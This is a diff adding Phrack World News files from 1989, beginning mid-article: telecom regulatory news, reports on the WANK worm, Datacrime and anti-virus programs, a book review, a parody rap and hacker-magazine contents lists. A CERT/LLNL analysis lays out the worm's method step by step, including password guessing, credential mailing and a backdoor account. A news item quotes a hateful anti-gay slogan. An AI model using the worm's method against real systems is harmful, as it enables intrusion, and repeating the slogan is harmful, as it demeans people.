+AT&T Vice President for consumer marketing.
+
+MCI spokeswoman Kathleen Keegan Thursday responded that, "our ad claims are
+accurate...  We will soon be filing a motion for a preliminary injunction to
+cause AT&T to cease its advertising campaign."
+
+Also on Thursday, the Federal Communications Commission upheld a decision
+giving AT&T greater freedom to compete for big corporate customers but rejected
+another pricing plan by AT&T.
+
+The FCC voted unanimously to uphold a pricing plan known as Tariff 12, which
+lets AT&T offer corporate customers a package of communications services.  AT&T
+contends it is at a disadvantage because MCI does not have to submit detailed
+filings to the FCC before they can serve customers.  MCI had challenged Tariff
+12, asking the FCC to overrule it and prohibit AT&T from offering full service
+communications packages to its customers.
+
+In the second item, the FCC declared unlawful a pricing plan known as Tariff
+15, that AT&T had applied solely to a single customer, the Holiday Corporation,
+owner of the largest hotel chain in the United States.  The FCC said AT&T could
+no longer justify the special rates to a single customer to meet competition
+when MCI was making the same service available to customers generally.
+
+                        >--------=====END=====--------<
diff --git a/phrack29/11.txt b/phrack29/11.txt
new file mode 100644
index 0000000..934782a
--- /dev/null
+++ b/phrack29/11.txt
@@ -0,0 +1,525 @@
+                                ==Phrack Inc.==
+
+                    Volume Three, Issue 29, File #11 of 12
+
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+            PWN                                                 PWN
+            PWN        P h r a c k   W o r l d   N e w s        PWN
+            PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
+            PWN                Issue XXIX/Part 2                PWN
+            PWN                                                 PWN
+            PWN                November 17, 1989                PWN
+            PWN                                                 PWN
+            PWN          Created, Written, and Edited           PWN
+            PWN               by Knight Lightning               PWN
+            PWN                                                 PWN
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+Offensive Message Flashes At Busy City Corner                  October 25, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Linda Wheeler (Washington Post)
+
+An offensive message that mystified the owners of an electronic information
+board was flashed Monday, October 23 at Connecticut Avenue and L Street NW, one
+of the city's (Washington DC) busiest intersections.
+
+A Georgetown University law student, Craig Dean, said he saw the message;
+
+          "HELP STAMP OUT A.I.D.S. NOW:  KILL ALL QUEERS AND JUNKIES"
+
+It flashed five times in 25 minutes.  Minutes after seeing the message, he
+called the city Human Rights Office and the Washington Blade, a gay community
+newspaper.
+
+Doug Hinckle, a staff photographer for the Blade, saw the message flash once
+and photographed it.
+
+Judith Miller, president of Miller Companies, which own the building at 1101
+Connecticut Avenue NW and the message board, said she did not know how the
+statement got onto the board.  She refused to believe it had appeared until she
+was shown of the photographs.
+
+Her company has complete control of the board and does not accept any paid
+messages or advertisements, Miller said.  "I would never do anything like
+that," she said.  "There is no way I would allow such a statement to appear."
+
+Yesterday, Keller, a five-year employee of the Miller Companies, said he did
+not write the statement and does now know how it became part of the normal flow
+of headline news.
+
+Miller said she believes her computer system may have a "virus" and will have
+experts search to find where the unauthorized statement originated.  "How
+absolutely awful," she said of the message.
+_______________________________________________________________________________
+
+"WANK" Worm On SPAN Network                                    October 17, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+>From The Computer Emergency Response Team
+
+On October 16, the CERT received word from SPAN network control that a worm was
+attacking SPAN VAX/VMS systems.  This worm affects only DEC VMS systems and is
+propagated via DECnet protocols, not TCP/IP protocols.  If a VMS system had
+other network connections, the worm was not programmed to take advantage of
+those connections.  The worm is very similar to last year's HI.COM (or Father
+Christmas) worm.
+
+This is NOT A PRANK.  Serious security holes are left open by this worm. The
+worm takes advantage of poor password management, modifies .com files, creates
+a new account, and spreads to other systems via DECnet.
+
+It is also important to understand that someone in the future could launch this
+worm on any DECnet based network.  Many copies of the virus have been mailed
+around.  Anyone running a DECnet network should be warned.
+
+R. Kevin Oberman from Lawrence Livermore National Labs reports:
+
+     "This is a mean bug to kill and could have done a lot of damage.
+     Since it notifies (by mail) someone of each successful penetration
+     and leaves a trapdoor (the FIELD account), just killing the bug is
+     not adequate.  You must go in an make sure all accounts have
+     passwords and that the passwords are not the same as the account
+     name."
+
+The CERT/CC also suggests checking every .com file on the system.  The worm
+appends code to .com files which will reopen a security hole everytime the
+program is executed.
+
+An analysis of the worm appears below and is provided by R. Kevin Oberman of
+Lawrence Livermore National Laboratory.  Included with the analysis is a DCL
+program that will block the current version of the worm.  At least two versions
+of this worm exist and more may be created.  This program should give you
+enough time to close up obvious security holes.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                           Report on the W.COM worm.
+                               R. Kevin Oberman
+                            Engineering Department
+                    Lawrence Livermore National Laboratory
+                               October 16, 1989
+
+The following describes the action of the W.COM worm (currently based on the
+examination of the first two incarnations).  The replication technique causes
+the code to be modified slightly which indicates the source of the attack and
+learned information.
+
+All analysis was done with more haste than I care for, but I believe I have all
+of the basic facts correct.
+
+Here is a description of the program:
+
+1. The program assures that it is working in a directory to which the owner
+   (itself) has full access (Read, Write,Execute, and Delete).
+
+2. The program checks to see if another copy is still running.  It looks for a
+   process with the first 5 characters of "NETW_".  If such is found, it
+   deletes itself (the file) and stops its process.
+
+   Note:  A quick check for infection is to look for a process name starting
+          with "NETW_".  This may be done with a SHOW PROCESS command.
+
+3. The program then changes the default DECNET account password to a random
+   string of at least 12 characters.
+
+4. Information on the password used to access the system is mailed to the user
+   GEMPAK on SPAN node 6.59.  Some versions may have a different address.
+
+5. The process changes its name to "NETW_" followed by a random number.
+
+6. It then checks to see if it has SYSNAM priv.  If so, it defines the system
+   announcement message to be the banner in the program:
+
+         W O R M S    A G A I N S T    N U C L E A R    K I L L E R S
+        _______________________________________________________________
+        \__  ____________  _____    ________    ____  ____   __  _____/
+         \ \ \    /\    / /    / /\ \       | \ \  | |    | | / /    /
+          \ \ \  /  \  / /    / /__\ \      | |\ \ | |    | |/ /    /
+           \ \ \/ /\ \/ /    / ______ \     | | \ \| |    | |\ \   /
+            \_\  /__\  /____/ /______\ \____| |__\ | |____| |_\ \_/
+             \___________________________________________________/
+              \                                                 /
+               \    Your System Has Been Officically WANKed    /
+                \_____________________________________________/
+
+         You talk of times of peace for all, and then prepare for war.
+
+7. If it has SYSPRV, it disables mail to the SYSTEM account.
+
+8. If it has SYSPRV, it modifies the system login command procedure to
+   APPEAR to delete all of a user's file.  (It really does nothing.)
+
+9. The program then scans the accounts logical name table for command
+   procedures and tries to modify the FIELD account to a known password with
+   login form any source and all privs.  This is a primitive virus, but very
+   effective IF it should get into a privileged account.
+
+10. It proceeds to attempt to access other systems by picking node numbers at
+    random.  It then used PHONE to get a list of active users on the remote
+    system.  It proceeds to irritate them by using PHONE to ring them.
+
+11. The program then tries to access the RIGHTSLIST file and attempts to access
+    some remote system using the users found and a list of "standard" users
+    included with the worm.  It looks for passwords which are the same as that
+    of the account or are blank.  It records all such accounts.
+
+12. It looks for an account that has access to SYSUAF.DAT.
+
+13. If a priv. account is found, the program is copied to that account and
+    started.  If no priv account was found, it is copied to other accounts
+    found on the random system.
+
+14. As soon as it finishes with a system, it picks another random system and
+    repeats (forever).
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Computer Network At NASA Attacked By Rogue Program             October 18, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by John Markoff (New York Times)
+
+A rogue computer program attacked a worldwide network of the National
+Aeronautics and Space Administration on Monday, October 16, inflicting no
+damage but forcing officials to disconnect the network from sensitive military
+and space systems.
+
+Security experts speculated that the program was written by someone who opposed
+Tuesday's (October 17) scheduled launching of the space shuttle Atlantis, which
+was to carry a nuclear-powered satellite into orbit.  The launching was
+postponed because of bad weather.
+
+NASA officials said the rogue program attacked an academic and research
+network, the Space Physics Analysis Network, which is not used for space
+shuttle mission control.
+
+But a NASA official said the agency felt compelled to disconnect several links
+between the network and an operational space shuttle network as a precaution.
+
+Computer security experts at several national laboratories said the Department
+of Defense had also severed the connection between commercial and research
+networks and nonclassified network that connects United States military
+installations and contractors around the world.
+
+The program was designed to copy itself secretly and send unwanted, sometimes
+vulgar messages to users of the NASA network.  It also tricks users into
+thinking that data have been destroyed, although no data are damaged.
+
+Like similar programs that have been sent into computer networks by pranksters
+and saboteurs, it exploited a flaw in the security system designed to protect
+the computers on the network.
+
+Computer security experts said Tuesday that they knew of about 60 computers
+that had been affected by the program.  A NASA spokesman said the program was
+still spreading.
+
+While the network is widely available to academic researchers with personal
+computers, the rogue program was designed to attack only 6,000 computers
+manufactured by the Digital Equipment Corporation.
+
+The flaw in the security of the Digital Equipment computers had been widely
+publicized over a year ago even before a similar rogue program jammed a group
+of interconnected international networks known as the Internet.  NASA officials
+said the program was only able to attack computers in which the necessary steps
+had not been taken to correct the flaw.
+
+Among the messages the program displayed on all infected computers was one that
+read:  "Worms Against Nuclear Killers.  You talk of times of peace for all, and
+then prepare for war."
+
+Computer scientists call this kind of program a worm, a reference to a program
+first described in the novel "Shockwave Rider" by a science fiction writer,
+John Brunner.
+_______________________________________________________________________________
+
+Virus Controversies Again                                       October 6, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~
+by John Markoff (New York Times)
+
+       "The issue has also sparked interest among computer scientists."
+
+Harold Highland, editor of Computers & Security, a professional journal, said
+he had received two research papers describing how to create such anti-virus
+programs.
+
+He has not decided whether to publish them.
+
+"No one has raised the obvious ethical questions," he added.  "I would hate to
+see a virus released to fight viruses.  Until it's tested you don't know
+whether it's going to do more damage than the program it is designed to fight."
+
+A number of these programs have already been written, computer researchers
+said.
+
+The one that destroyed the data on business and governmental personal computers
+in the United States was reportedly designed by a Venezuelan programmer.  How
+many computers were affected and where they were is unclear.
+
+That program is called Den Zuk, or Search.  It was intended to attack a
+destructive program known as the Brain Virus that was distributed in 1986 by
+two brothers who owned a small computer store in Pakistan.
+
+Errors in the design of the program illustrate the potential danger of such
+viruses, critics say.  Fridrik Skulason, a microcomputer specialist at the
+University of Iceland in Reykjavik, who has disassembled the program, said the
+author of Den Zuk had failed to take into account the different capacities of
+disks available for IBM and IBM-compatible machines.
+
+Because of that simple error, when the program infects a higher-capacity disk
+it destroys data.
+
+"They probably wrote with good intention," he said.  "The only problem is that
+the programmers were not able to do their job correctly."
+
+At least two other anti-viral viruses have already been devised, said Russell
+Brand, a computer security researcher at Lawrence Livermore.
+
+He said programmers at one company, which he would not identify, had written
+the programs to combat the Scores virus, a program that infected Macintosh
+computers last year.
+
+He added that even though the programs were designed so they could not go
+beyond the company's own computers, there had been a heated debate over whether
+to deploy the programs.  He said he did not know how it was decided.
+
+Brand said a group of computer researchers he works with at Lawrence Livermore
+had written several self-replicating programs after the appearance of the rogue
+program that Morris of Cornell is accused of writing.  But he added that the
+group had never given permission to release the programs.
+
+The debate over vigilante viruses is part of a broader discussion now taking
+place among some computer researchers and programmers over what is being termed
+"forbidden knowledge."
+
+"There are ethical questions any time you send something out there that may
+find itself invited on to somebody else's computer," said Pamela Kane, author
+of a book on computer virus protection.
+
+In California this month a group of computer hackers plans to hold a forum on
+"forbidden knowledge in a technological society."
+
+While the role of the computer hacker has been viewed as mischievous in a
+negative way, hackers have consistently played a role as innovators, said Lee
+Felsenstein, a Berkeley, California, computer expert who designed several early
+personal computers.
+
+"Computer hacking was originally a response to the perception of a priesthood's
+control over immensely powerful technological resources," he said.  "Informed
+individuals were able to break the power of this priesthood through gaining and
+spreading the body of forbidden knowledge."
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Dreaded Personal Computer Virus May Be Only A Cold              October 6, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Don Clark (New York Times)
+
+It won't be much of a plague.  But the hysteria anticipating it has been
+world-class.
+
+Those observations come from computer-security experts as they await Datacrime,
+a virus program set to attack IBM-compatible personal computers starting
+Thursday, October 12, 1989.
+
+Analyses of the program, also called the Columbus Day Virus, show that it is
+indeed destructive.  It just hasn't spread very far.
+
+"It's going to be the week of the non-event," predicted John McAfee, a Santa
+Clara, California, consultant who serves as chairman of the Computer Virus
+Industry Association.  "You have more chance of being hit by a meteor than
+getting this virus."
+
+McAfee Associates, which acts as a clearinghouse for virus information, has
+received just seven confirmed reports of Datacrime in six months -- compared
+with three to 50 reports per day about another virus that originated in Israel
+in 1987.  He thinks only 50 copies of Datacrime exist, and 40 of those are in
+the hands of researchers.
+
+"It's gotten more publicity than it deserves," agreed Russell Brand, another
+virus expert, who advises Lawrence Livermore National Laboratory.
+
+Brand expects to find just 20 copies among the 75,000 computers he monitors at
+1,000 sites.
+
+Such projections are disputed by some.  They are based on how often Datacrime
+has been detected by computer users using special software that scans their
+systems for the virus.
+
+The virus could have infected many users who have not bothered to scan their
+systems, McAfee concedes.
+
+Fears have been whipped up by the news media and computer managers at companies
+and government agencies.  Companies promoting products to eradicate viruses
+also have played a role -- understandably.
+
+Staid IBM Corporation this week took the unusual step of offering a program
+that checks systems for viruses.  The company hasn't detected the virus in its
+own operations, but concedes that many customers are worried.  "They are asking
+us how we protect our software-development operations from viruses," said Bill
+Vance, who was appointed a year ago as IBM's director of secure systems.
+
+Bank of America, a huge IBM customer with 15,000 PCs, recently put out a
+company-wide notice advising users to make backup copies of their computer data
+by Wednesday, the day before the virus is programmed to strike.
+
+Three different government agencies have panicked and sent out multiple
+versions of incorrect advice," Brand said.
+
+Worried calls have deluged McAfee's office, which has just three lines for
+computer communications and three for voice.
+
+"We put the phone down and it's 30 seconds before it rings again," he said.
+
+Computer sleuths detected Datacrime -- and have detected other viruses -- by
+looking for changes in the size of data files and in the way programs operate.
+The underlying code used to write the program, once disassembled by experts,
+indicates when the program will activate itself.
+
+The identity of Datacrime's author isn't known, although some reports have
+linked the virus to an anonymous hacker in Austria.  It first began showing up
+in March, McAfee said, and gained notoriety after it was discussed at the
+midsummer Galactic Hackers Conference in Amsterdam.
+
+It appears to be relatively prevalent in the Netherlands and other European
+countries.  Dutch computer users have reportedly bought hundreds of programs
+that are said to detect and destroy the program.
+
+Like other viruses, Datacrime rides along with innocuous programs when they are
+exchanged over a computer network or computer bulletin board or through
+exchange of infected disks.  Unlike many viruses, it has been designed to later
+insert itself in data files that users don't often examine.
+
+If one of the programs is executed after the target date, Datacrime proceeds
+with its dirty work -- destroying the directory used to keep track of files on
+a computer's hard disk.  The crime is analogous to destroying a card file in
+the library.
+
+"By destroying this one table you can't find where any of your data is," said
+Brand.
+
+But no one should really be in a fix if he makes backup copies of data, experts
+say.  The data, once safely stored on another disk drive or on magnetic tape,
+can be restored by computer professionals even if the virus has infected the
+backup files.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+"Vaccines" To Hunt Down Rogue Programs                          October 6, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by John Markoff (New York Times)
+
+Ever since a rogue program created by a graduate student jammed a nationwide
+computer network last year, the rapid spread of such disruptive software, often
+known as viruses, has caused growing alarm among computer users.
+
+Now, to fight fire with fire, some companies, individuals and even a government
+research laboratory are crafting a new breed of what have been called
+anti-viruses to hunt down intruders.
+
+The trouble is, some computer security experts say, the problem of viruses may
+be exaggerated -- and the new crime fighter may do even more damage than the
+criminal.
+
+Much like an infection, a well-intended but badly designed program to stop
+viruses can run amok, knocking out thousands of computers or destroying vast
+amounts of data.
+
+Indeed, one of the anti-virus programs intended to defeat a known virus has
+already destroyed data on business and governmental personal computers in the
+United States.
+
+The issue has touched off a heated debate over whether the creation of these
+high-technology vigilantes is a responsible action.  "The risks are just
+enormous," said Peter Neumann, a computer security expert at SRI International,
+a technology research center in Menlo Park, California.  "It's an unbelievably
+unsafe thing to do."
+
+But Chris Traynor, a programmer at Divine Axis, a software development company
+in Yonkers, New York, argues that anti-virus programs can be contained so that
+they do not spread out of control, reaching and possibly damaging data in other
+computers.  His company is now trying to design such a program.
+
+Computer researchers at the Lawrence Livermore Laboratory, a federal weapons
+center in Livermore, California, have designed similar programs that patrol
+computer networks in search of breaches through which viruses could enter the
+system.
+
+Viruses, which got their name because they mimic in the computer world the
+behavior of biological viruses, are programs, or sets of instructions, that can
+secretly be spread among computers.
+
+Viruses can travel either over a computer network or on an infected disk passed
+by hand between computer users.
+
+Once the infection has spread, the virus might do something as benign as
+displaying a simple message on a computer screen or as destructive as erasing
+the data on an entire disk.
+
+Computer security experts have been concerned for several years by the
+emergence of vandals and mischief makers who deliberately plant the destructive
+programs.
+
+But in recent weeks international alarm has reached new heights as rumors have
+spread that a virus program will destroy data on thousands of computers this
+month, on Friday the 13th.
+
+Computer security researchers said the virus, known as Datacrime, was one of at
+least three clandestine programs with internal clocks set to destroy data on
+that date.
+
+As is usually the case, no one knows who wrote the program, but U.S. military
+officials have mentioned as possible suspects a European group linked to West
+German terrorists and a Norwegian group displeased with the fame of Christopher
+Columbus, who is honored next week.
+
+Largely in response to customer concerns, IBM said on Monday that it was
+offering programs for its personal computers that would scan for viruses.
+
+But several computer security experts say public fears are largely exaggerated.
+
+They note that there have been fewer than a dozen reported appearances of the
+Datacrime virus in the United States, and contend that the whole issue is
+overblown.
+
+Still, in the personal computer world, where many users have little knowledge
+of the technical workings of their machines, concern over computer viruses has
+become widespread.
+
+The issue got the most attention last November, when, it is charged, Robert
+Morris, a graduate student at Cornell, unleashed a rogue program that because
+of a small programming error, ran wildly out of control, copying itself
+hundreds of times on thousands of computers, overloading a national network,
+
+As a result of the mounting concern, a new industry has blossomed offering
+users protective programs known as vaccines, or anti-viral software.
+
+These programs either alert users that a virus is attempting to tamper with
+their computer or scan a computer disk and erase any rogue program that is
+detected.
+
+These conventional programs do not automatically migrate from computer to
+computer, but now some experts are exploring fashioning programs that graft the
+powers of the vaccines onto viruses in order to pursue and stop them wherever
+they go.
+
+Designing and spreading such programs was proposed in August by several people
+attending an international gathering of computer hobbyists, or "hackers," in
+Amsterdam.
+
+They suggested that it was a good way for members of the computer underground
+to make a positive contribution.
+
+But many researchers believe the idea is dangerously flawed because of the
+possibility of accidentally doing great damage.
+
+Some computer security researchers worry that writing an infectious program to
+stop viruses may be taken as an intellectual challenge by hackers who are well
+meaning but do not grasp what problems they could create.
+
+"One of the questions that the hacker community is now addressing is what you
+do about young hackers," said Stewart Brand, a writer in Sausalito, California,
+who is working on a book on outlaw cultures and high technology.
+
+"They don't have a sense of responsibility; they have a sense of curiosity.
+These are deliciously debatable issues, and I don't see them going away."
+
+                        >--------=====END=====--------<
diff --git a/phrack29/12.txt b/phrack29/12.txt
new file mode 100644
index 0000000..e1406e8
--- /dev/null
+++ b/phrack29/12.txt
@@ -0,0 +1,496 @@
+                                ==Phrack Inc.==
+
+                    Volume Three, Issue 29, File #12 of 12
+
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+            PWN                                                 PWN
+            PWN        P h r a c k   W o r l d   N e w s        PWN
+            PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
+            PWN                Issue XXIX/Part 3                PWN
+            PWN                                                 PWN
+            PWN                November 17, 1989                PWN
+            PWN                                                 PWN
+            PWN          Created, Written, and Edited           PWN
+            PWN               by Knight Lightning               PWN
+            PWN                                                 PWN
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+The Cuckoo's Egg                                               October 18, 1989
+~~~~~~~~~~~~~~~~
+by By Christopher Lehmann-Haupt (New York Times)
+
+            "Tracking a Spy Through the Maze of Computer Espionage"
+
+It all begins with a 75-cent discrepancy in the computer complex's accounting
+system.  Clifford Stoll, the new man in the office, is assigned to reconcile
+the shortfall.
+
+Although an astronomer by training, Stoll has recently seen his grant money run
+dry and so has been transferred from the Keck Observatory at the Lawrence
+Berkeley Lab down to the computer center in the basement of the same building.
+No wizard at computers, he thinks he can pick things up fast enough to get by.
+So he sets out to look for the 75 cents.
+
+He quickly discovers that no glitch in the accounting programs has occurred.
+No, what seems to have happened is that an unfamiliar user named Hunter briefly
+logged on to the system, burning up 75-cents worth of time.  Since there is no
+account record for Hunter, Stoll erases him from the system.  The problem is
+solved, or so it seems.
+
+But almost immediately, an operator from Maryland on the same network that the
+Lawrence Berkeley Lab uses complains that someone from Stoll's lab is trying to
+break into his computer.  When Stoll checks the time of the attempt, he
+discovers that the account of someone named Joe Sventek, who is known to be in
+England for the year, has been used.  So he guesses that the user calling
+himself Hunter has somehow activated Sventek's account.  But who is this hacker
+(as Stoll begins to refer to him), where is he operating from and how is he
+getting into the system?
+
+Next Stoll sets up systems to alert him every time the hacker comes on line and
+monitor his activities without his being aware of it.  He watches as the hacker
+tries to lay cuckoo's eggs in the system's nest, by which of course he means
+programs for other users to feed -- for instance, a program that could decoy
+other users into giving the hacker their secret passwords.  He watches as the
+hacker invades other computer systems on the networks the Lawrence Berkeley Lab
+employs, some of them belonging to military installations and contractors.
+
+The mystery grows.  Telephone traces gradually establish that the hacker is not
+a local operator, is not on the West Coast and may not even be in North
+America.  But of the various three-letter organizations that Stoll appeals to
+for help -- among them the FBI, the CIA and even the National Security Agency
+-- none will investigate, at least in an official capacity.
+
+By now a reader is so wrapped up in Stoll's breezily written account of his
+true adventure in "The Cuckoo's Egg:  Tracking a Spy Through the Maze of
+Computer Espionage" that he is happy to overlook certain drawbacks in the
+narrative -- most conspicuously the lack of consistently lucid technical talk
+and the author's dithering over whether appealing for help to the likes of the
+FBI and CIA is selling out to the enemy, a qualm left over from the 1960s
+mentality that still afflicts him and his friends.
+
+The only truly annoying aspect of the book is that an endpaper diagram gives
+away the location of the computer spy.  Readers are advised not to look at the
+endpapers, which do little but spoil the suspense.
+
+Unfortunately, the narrative, too, eventually helps dissipate the story's
+tension.  The officials who finally take over the hunt from Stoll are so
+reluctant to tell him what is happening that all the suspense he has created
+simply evaporates.  Even Stoll seems to lose interest in the identity of his
+mysterious antagonist, judging by the limp and haphazard way he finally does
+give us the news.
+
+Instead of building his story, he allows himself to be distracted by a banal
+domestic drama centering on his decision to stop being afraid of emotional
+commitment and marry the woman he has been living with for seven years.  And he
+continues limply to debate the need of the state to defend the security of
+communications networks against wanton vandalism, as if there were room for
+serious discussion of the question.
+
+Still, nothing can expunge the excitement of the first two-thirds of "The
+Cuckoo's Egg," particularly those moments when the author hears his portable
+beeper going off and bicycles to his lab to read the latest printout of the
+hacker's activities.
+
+Nothing can relieve our discouragement at the bureaucratic runaround that Stoll
+got.  Had a million dollars worth of damage occurred? the FBI kept asking him.
+
+"Well, not exactly," he would reply.  Then there was nothing the FBI could do.
+
+And so it dishearteningly went, although some points should be conceded.
+Certain individuals in government agencies were extremely helpful to Stoll.
+
+The entire issue of computer-network security was after all a new and
+unexplored field.  And the agencies that the author was asking for help
+probably knew more about the security threat than they were willing to tell
+him.
+
+Finally, nothing can diminish the sense of the strange new world Stoll has
+evoked in "The Cuckoo's Egg" -- a world in which trust and open communication
+will determine the quality of the future.  Whether such values will prevail
+will prove a drama of momentous significance.  Even if this book finally
+dissipates that drama, its very presence makes these pages worth dipping into.
+_______________________________________________________________________________
+
+Digital's Hip To The Standards Thing                           October 10, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+NEW YORK -- During a creative session at a major public relations firm to
+formulate a new corporate message for Digital Equipment Corporation that
+reflects the company's new direction promoting and supporting computing
+industry standards, the shopworn phrase "Digital has it now" was replaced by a
+new tag line that is more contemporary and tied to DEC's adherence to
+standards.
+
+                            DECrap by Rapmaster Ken
+                    "Digital's Hip to the Standards Thing"
+
+
+                     I heard some news just the other day
+                It sounded kinda strange and I said, "No way!"
+                   But I heard it again from another source
+                 It mighta made sense and I said, "Of course!"
+
+                    Now computer biz has a lotta confusion
+                 'Cause operating systems abound in profusion.
+                But there's a whole new wave in data processing
+                Now that Digital's hip to the standards thing.
+
+                                   (chorus)
+                     Digital's hip to the standards thing!
+                     Digital's hip to the standards thing!
+
+                         Way back when a long time ago
+                           IBM owned the whole show.
+                   But other dudes saw this proprietary mess
+                And formed committees to find out what's best.
+
+             Some went their own way and built their own software
+         But users were perturbed, "It's just a different nightmare."
+                  So they got together to look over the picks
+                     Put down their money on good 'ol UNIX
+
+                                   (chorus)
+                     Digital's hip to the standards thing!
+                     Digital's hip to the standards thing!
+
+                  Now Digital always kept their users in mind
+                    And pushed VMS as the best of the kind.
+                   A lotta folks agreed but kept askin' for
+                      UNIX support, "We gotta have more!"
+
+                  Soon DEC saw the light and decided to give
+                UNIX to the masses, (sorta live and let live).
+                  So DEC's ridin' the wave ahead of the rest
+               On a backplane boogie board on top of the crest.
+
+                  No doubt about it DEC's sprouted its wings
+                 'Cause Digital's hip to the standards thing.
+
+                                   (chorus)
+                     Digital's hip to the standards thing!
+                     Digital's hip to the standards thing!
+_______________________________________________________________________________
+
+Hacker Publications                                           November 12, 1989
+~~~~~~~~~~~~~~~~~~~
+Here is a general overview of a pair of the more popular hardcopy hacker
+magazines.
+
+2600 Magazine:  The Hacker Quarterly
+Volume Six, Number Three
+Autumn, 1989
+
+The cover on this issue features a scene from the Galactic Hackers Convention
+that took place in Amsterdam, Switzerland, last August.  Although it is not
+explicitly stated or implied, it would appear that the comic illustration
+portrays the hacker "Shatter" being run over by a bus bearing the label "2600
+XPRESS."
+
+The articles featured in this issue include:
+
+The Nynex Strike
+Grade "A" Hacking:  What Is UAPC? by The Plague
+Galactic Hacker Party (GHP)
+British Telecom's Guilty Conscience
+The Death Of COSMOS?
+What's Going On
+     -  Technological Marvels
+             o  U.S. Sprint Billing Problems
+             o  U.S. Sprint Voicecards
+             o  Other Voiceprints
+             o  Surveillance
+     -  Hacker Spies (Chaos Computer Club, KGB Hackers discussed)
+     -  Nynex Bigotry (Gay And Lesbian Organizations)
+     -  Dial-It News (Pacific Bell 900 Services)
+     -  Payphone Choices (AT&T, Sprint, MCI, AOS)
+     -  Overseas Access (AT&T Calls To Vietnam)
+     -  News From The U.K.
+             o  Directory Assistance Operators
+             o  British Telecom To Buy Tymnet From McDonnel Douglas
+             o  Chat Lines Banned
+     -  One Less Choice (The Source and Compuserve)
+     -  Privacy?  What's That?
+             o  Bulletin Board User Information
+             o  Illegal Aliens Database
+             o  Scotland Yard Database
+             o  Wiretapping
+             o  Bell of Pennsylvania (giving out confidential information)
+             o  Personal Smart Card
+     -  Hackers In Trouble
+             o  Kevin Mitnick
+             o  Robert Morris
+     -  Hacker Fun
+             o  Friday The 13th Virus
+             o  Speed Limit Alterations
+             o  Delray Beach Probation Office
+     -  Telco Literature (FON Line Newsletter)
+     -  Calling Card Tutorials
+     -  Another Telco Ripoff (C&P Telephone)
+     -  Technology Marches Back
+             o  French Computer Mixup
+             o  New York Telephone Repairman Sent On Wild Goose Chases
+     -  And Finally (Bejing Phone Calls)
+The Secrets of 4TEL
+Letters
+     -  Moblie Telephone Info
+     -  A Southern ANI
+     -  ROLM Horrors
+     -  A Nagging Question (by The Apple Worm)
+     -  A Request
+     -  Another Request (by THOR <claims the Disk Jockey story was a lie>)
+     -  The Call-Waiting Phone Tap (Alternative Inphormation)
+     -  Interesting Numbers (1-800-EAT-SHIT, 800, 900 numbers)
+     -  UNIX Hacking (Unix security, hacking, TCP/IP)
+     -  Intelligent Payphones
+     -  Retarded Payphones
+REMOBS by The Infidel
+Gee... GTE Telcos by Silent Switchman and Mr. Ed
+Voice Mail Hacking... by Aristotle
+Punching Pay Phones by Micro Surgeon/West Coast Phreaks
+Touch-Tone Frequencies
+2600 Marketplace
+Carrier Access Codes
+Lair of the INTERNET Worm by Dark OverLord
+Timely Telephone Tips (from a Defense Department Phone Book)
+
+There were also plenty of other interesting small articles, pictures, and
+stories about hackers, telephones, computers and much more.  All in all, this
+is the best issue of 2600 Magazine I have read in several issues (despite the
+fact that some of the material had appeared in Phrack Inc., LOD/H TJs, and/or
+Telecom Digest previously).  Let's hope they continue to be as good.
+
+Are you interested in 2600 Magazine?
+
+2600 (ISSN 0749-3851) is published quarterly by 2600 Enterprises Inc.,
+7 Strong's Lane, NY 11733.  Second class postage permit paid at Setauket, New
+York.
+
+Copyright (c) 1989, 2600 Enterprises, Inc.
+Yearly subscriptions:  U.S. and Canada -- $18 individual, $45 corporate.
+Overseas -- $30 individual, $65 corporate.
+Back issues available for 1984, 1985, 1986, 1987, 1988 at $25 per year, $30 per
+year overseas.
+
+Address all subscription correspondence to:
+
+                         2600 Subscription Department
+                                 P.O. Box 752
+                      Middle Island, New York  11953-0752
+
+                        2600 Office Line:  516-751-2600
+                        2600 FAX Line:     516-751-2608
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+TAP Magazine
+Issue 94
+1989
+
+The new TAP Magazine is a smaller publication in comparison to 2600.  The
+"outer" cover of this newsletter was a "warning" from The Predat0r concerning
+the nature of the material inside.  The true or "inner" cover of the newsletter
+had the following:
+
+          The Information You've Requested Of TAP Publishing Society
+                 A Unit Of The Technological Advancement Party
+
+                                  Presents...
+
+"...a family of people dedicated to the advancement of home computer systems
+and electronic technology, the study and duplication of related communication
+networks and the subsequent utilization of one's own ingenuity in today's
+fast-paced world of creative logic."
+
+The articles in this issue of TAP included:
+
+TAP RAP:  News From The TAP Staff by Aristotle
+Small Tags Protect Big Stores (continued from TAP 93)
+Ozone (concerning American Telephone & Telegraph's plans for 1994)
+Telephone Wires In New York In 1890
+Mercury Fulminate by Dark OverLord
+How To Hack Stamps
+Hoffman Worked To Help All Of Mankind
+Police Raid 3 Jefferson Homes In Search For Computer Hackers by Calvin Miller
+SummerCon '89 by Aristotle (includes a copy of the official SummerCon '89
+              poster and button, although an error stating that the poster was
+              shown at 1/2 size when in reality, the original was 8 1/2" by
+              14").
+
